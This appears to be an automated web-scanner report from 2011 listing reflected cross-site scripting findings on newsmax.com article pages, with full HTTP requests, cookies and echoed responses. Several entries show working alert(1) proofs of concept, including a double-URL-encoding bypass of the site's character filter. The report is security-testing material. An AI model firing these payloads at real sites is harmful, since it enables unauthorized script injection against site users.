The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f0ec'%20a%3db%200d25f46eeae was submitted in the REST URL parameter 2. This input was echoed as 7f0ec' a=b 0d25f46eeae in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin7f0ec'%20a%3db%200d25f46eeae/2011/03/18/id/389924 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:19 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Condi ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin7f0ec' a=b 0d25f46eeae/2011/03/18/id/389924' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93755'%20a%3db%20af3bda33851 was submitted in the REST URL parameter 3. This input was echoed as 93755' a=b af3bda33851 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/201193755'%20a%3db%20af3bda33851/03/18/id/389924 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:29 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Condi ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/201193755' a=b af3bda33851/03/18/id/389924' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25499'%20a%3db%2013dbdb043e was submitted in the REST URL parameter 4. This input was echoed as 25499' a=b 13dbdb043e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/0325499'%20a%3db%2013dbdb043e/18/id/389924 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45912
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Condi ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/0325499' a=b 13dbdb043e/18/id/389924' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 30ca2'%20a%3db%20db0bf94c2c9 was submitted in the REST URL parameter 5. This input was echoed as 30ca2' a=b db0bf94c2c9 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/1830ca2'%20a%3db%20db0bf94c2c9/id/389924 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:04 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Condi ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/1830ca2' a=b db0bf94c2c9/id/389924' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3562'%20a%3db%20219ba10a3f8 was submitted in the REST URL parameter 7. This input was echoed as e3562' a=b 219ba10a3f8 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924e3562'%20a%3db%20219ba10a3f8 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41321
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924e3562' a=b 219ba10a3f8' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a45d%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9f287766a11 was submitted in the REST URL parameter 7. This input was echoed as 4a45d"><img src=a onerror=alert(1)>9f287766a11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/3899244a45d%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9f287766a11 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41769
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(3899244a45d"><img src=a onerror=alert(1)>9f287766a11);" class="article_tools_link"> ...[SNIP]...
1.7. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b2e"><script>alert(1)</script>6a58b4e89c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924?72b2e"><script>alert(1)</script>6a58b4e89c1=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46152
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:35 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Condi ...[SNIP]... <a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924?72b2e"><script>alert(1)</script>6a58b4e89c1=1')" class="article_tools_link"> ...[SNIP]...
1.8. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b5eb'><script>alert(1)</script>04af1edded7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924?1b5eb'><script>alert(1)</script>04af1edded7=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46147
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Condi ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924?1b5eb'><script>alert(1)</script>04af1edded7=1' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64891'%20a%3db%2081688a489b9 was submitted in the REST URL parameter 2. This input was echoed as 64891' a=b 81688a489b9 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms64891'%20a%3db%2081688a489b9/2011/03/17/id/371701 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46364
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Bulim ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms64891' a=b 81688a489b9/2011/03/17/id/371701' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9c50'%20a%3db%20dd3ff6641cd was submitted in the REST URL parameter 3. This input was echoed as c9c50' a=b dd3ff6641cd in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011c9c50'%20a%3db%20dd3ff6641cd/03/17/id/371701 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46364
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:28 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Bulim ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011c9c50' a=b dd3ff6641cd/03/17/id/371701' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f968b'%20a%3db%206771464688f was submitted in the REST URL parameter 4. This input was echoed as f968b' a=b 6771464688f in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03f968b'%20a%3db%206771464688f/17/id/371701 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46364
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Bulim ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03f968b' a=b 6771464688f/17/id/371701' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5c87e'%20a%3db%2030e6dac8390 was submitted in the REST URL parameter 5. This input was echoed as 5c87e' a=b 30e6dac8390 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/175c87e'%20a%3db%2030e6dac8390/id/371701 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46364
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Bulim ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/175c87e' a=b 30e6dac8390/id/371701' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 288e0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e40508d0de2 was submitted in the REST URL parameter 7. This input was echoed as 288e0"><img src=a onerror=alert(1)>40508d0de2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701288e0%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e40508d0de2 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41515
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:13 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(371701288e0"><img src=a onerror=alert(1)>40508d0de2);" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 139d9'%20a%3db%20f3748a4328f was submitted in the REST URL parameter 7. This input was echoed as 139d9' a=b f3748a4328f in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701139d9'%20a%3db%20f3748a4328f HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 41078
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:14:16 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701139d9' a=b f3748a4328f' class="article_tools_link"> ...[SNIP]...
1.15. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c7a7f'><script>alert(1)</script>5a04eb222fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701?c7a7f'><script>alert(1)</script>5a04eb222fb=1 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 46586
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:12:51 GMT
Connection: close
